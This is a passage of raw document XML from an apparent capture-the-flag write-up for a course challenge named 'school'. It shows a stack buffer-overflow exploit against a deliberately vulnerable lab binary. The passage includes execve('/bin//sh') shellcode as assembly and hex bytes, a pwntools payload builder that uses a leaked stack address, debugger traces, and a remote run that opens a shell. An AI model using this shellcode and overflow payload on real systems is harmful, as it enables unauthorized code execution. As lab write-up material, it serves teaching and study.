          <w:p w14:paraId="7AB801DA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffdde3                  pop    rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002C0375" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffdde4                  cdq    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338D4B57" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">●→ 0x7fffffffdde5                  syscall </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E90060C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0644E07E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B64E4FE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>registers ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B1A5FD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rax   : 0x3b              </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223999DA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rsp   : 0x00007fffffffddf0  →  "/bin//sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D009DA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rsi   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4616B8E0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rdi   : 0x00007fffffffddf0  →  "/bin//sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BF4A8E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="759C19FA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="009D7759" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F8379F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddf0│+0x0000: "/bin//sh"     ← $rsp, $rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547AA1A2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77A76424" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Debugger Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9A1E7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The complete shellcode is below. The shellcode was made using several examples.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3685"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="3F403336" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1223"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4B84F941" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>xor rsi,rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="475B0077" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092DA482" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rdi,0x68732f2f6e69622f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370CC972" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0098F96D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A58A5E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>pop rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B9DB5D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push 0x3b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1921725D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>pop rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="332D277D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>cdq</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6650A7BF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF97CE1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A388A8C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Building the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627E949" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The payload comprises 40 bytes of hex-encoded shellcode and padding followed by the leaked address.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="0E44CCDC" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1223"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="542D79D9" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def getAddr(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA85BFC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.recvuntil("at: ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28DDD0CE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>a = cleanLine(p.recvuntil("."))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A024DC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>ad =  re.split("\.", a)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB2E456" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>return ad[0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BEE9DF8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C2F0E22" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def buildPld(a):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="443DFC6D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>code = b'\x48\x31\xF6\x56\x48\xBF\x2F\x62\x69\x6E\x2F\x2F</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1909C5C8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              \x73\x68\x57\x54\x5F\x6A\x3B\x58\x99\x0F\x05'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F53784" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p = 40 - len(code)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285F7CBA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pad = b'A'*p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7240A0C4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addr = p64(int(a, 16))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34647E0F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">return </w:t>
            </w:r>
            <w:r w:rsidRPr="00C96695">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>code + pad + addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0073CB5F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Solution Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754DBEDF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435"/>
    <w:p w14:paraId="42A0562B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After the main method returns, the debugger shows the shellcode in the stack as the next set of instructions to execute.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="0CEF2E86" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1223"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1C1676E1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24DB659D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 School_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FD603A4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Switching to interactive mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2056689F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, H1\xf6VH\xbf/bin//shWT_j;X\x99\x0f\x05AAAAAAAAAAAAAAAAA\xd0\xdd\xff\xff\xff\x7f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF85E86" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C4F0E73" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 1, 0x0000000000400681 in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FEA2E76" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> →   0x400681 &lt;main+80&gt;        ret    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06055929" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="003928CE">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="003928CE">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>↳</w:t>
            </w:r>
            <w:r w:rsidRPr="003928CE">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">  0x7fffffffddd0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">                  </w:t>
            </w:r>
            <w:r w:rsidRPr="003928CE">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>xor    rsi, rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163A29C7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0x7fffffffddd3                  push   rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50616D64" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0x7fffffffddd4                  movabs rdi, 0x68732f2f6e69622f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44AE74B6" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0x7fffffffddde                  push   rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C04CB8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0x7fffffffdddf                  push   rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="334C308C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0x7fffffffdde0                  pop    rdi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ED87EFB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Code in Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C34C7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>This payload caused the program to open a shell after the return.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="5C030002" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="755"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="37D1AF14" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>gef</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>➤</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  $ c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0236649E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Continuing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BBEA669" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>process 175805 is executing new program: /usr/bin/dash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A2432DA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFC523" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFAB7F1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The same payload resulted in the successful exploitation of </w:t>
      </w:r>
      <w:r w:rsidRPr="003928CE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>school</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> running on a remote system.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="37BE3782" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="755"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="296F656E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3192EE60" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 School_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CCFA24D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Opening connection to offsec-chalbroker.osiris.cyber.nyu.edu on port 1338: Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74926479" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Switching to interactive mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F256394" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4869F4B7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, H1\xf6VH\xbf/bin//shWT_j;X\x99\x0f\x05AAAAAAAAAAAAAAAAAЖ\x06s\xfc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23DDE30E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="125C4A02" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>pwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798FF1DC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ pwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223E7B89" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>/home/pwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5215FEED" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E1A0DE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE52529" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>school</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CF7ECC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
